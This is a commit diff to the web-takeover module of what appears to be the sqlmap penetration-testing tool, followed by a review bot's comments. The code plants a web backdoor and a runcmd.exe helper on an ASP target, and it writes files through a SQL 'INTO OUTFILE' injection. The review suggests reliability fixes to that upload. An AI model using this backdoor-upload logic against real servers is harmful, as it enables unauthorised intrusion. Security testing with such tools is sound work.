

Commit 858cb25

committed
update
1 parent 0795e11 commit 858cb25

1 file changed

Lines changed: 23 additions & 7 deletions


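--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -23,6 +23,7 @@
 """
 
 import os
+import posixpath
 import re
 
 from extra.cloak.cloak import decloak
@@ -86,8 +87,7 @@ def webFileUpload(self, fileToUpload, destFileName, directory):
 return retVal
 
 def __webFileStreamUpload(self, stream, destFileName, directory):
-stream.seek(0) #rewind
-
+stream.seek(0) #rewind
 if self.webApi in ("php", "asp"):
 multipartParams = {
 "upload": "1",
@@ -109,7 +109,7 @@ def __webFileStreamUpload(self, stream, destFileName, directory):
 return False
 
 def __webFileInject(self, fileContent, fileName, directory):
-outFile = normalizePath("%s/%s" % (directory, fileName))
+outFile = posixpath.normpath("%s/%s" % (directory, fileName))
 uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)
 query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
 query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
@@ -197,7 +197,23 @@ def webInit(self):
 infoMsg += "on '%s'" % directory
 logger.info(infoMsg)
 
-if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
+if self.webApi == "asp":
+runcmdName = 'runcmd.exe'
+runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, runcmdName + '_'), runcmdName)
+scriptsDirectory = "Scripts"
+backdoorDirectory = "%s..\%s" % (posixToNtSlashes(directory), scriptsDirectory)
+backdoorContent = backdoorContent.replace("WRITABLE_DIR", backdoorDirectory)
+backdoorStream.file.truncate()
+backdoorStream.read()
+backdoorStream.seek(0)
+backdoorStream.write(backdoorContent)
+if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
+self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
+self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
+self.webDirectory = directory
+else:
+continue
+elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
 warnMsg = "backdoor hasn't been successfully uploaded "
 warnMsg += "with uploader probably because of permission "
 warnMsg += "issues."
@@ -209,9 +225,9 @@ def webInit(self):
 self.__webFileInject(backdoorContent, backdoorName, directory)
 else:
 continue
-
-self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
-self.webDirectory = directory
+self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
+self.webDirectory = directory
+
 infoMsg = "the backdoor has probably been successfully "
 infoMsg += "uploaded on '%s', go with your browser " % directory
 infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl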
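Review bot: In the new `asp` branch of the fourth hunk (new lines 200–215), `backdoorDirectory = "%s..\%s" % (...)` only works because `\%` is not a recognized escape sequence and is left alone; that is fragile and reads as a typo, so spell the backslash out: `backdoorDirectory = "%s..\\%s" % (posixToNtSlashes(directory), scriptsDirectory)`. The temporary file returned by `decloakToNamedTemporaryFile` for `runcmdStream` is never closed on either path, and the return value of its upload on line 211 is discarded, so `webBackdoorUrl` is set even when that second upload failed; checking that result and closing the stream once it is no longer needed would make the status reported to the user trustworthy. The `else: continue` on lines 214–215 also bypasses the `warnMsg` handling the other branch performs, so a failed upload in `asp` mode produces no warning at all; logging a short message mirroring `warnMsg` before the `continue` keeps the two branches consistent. `webInit` begins before this hunk and the loop that `continue` belongs to is not visible here, so that part is inferred.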
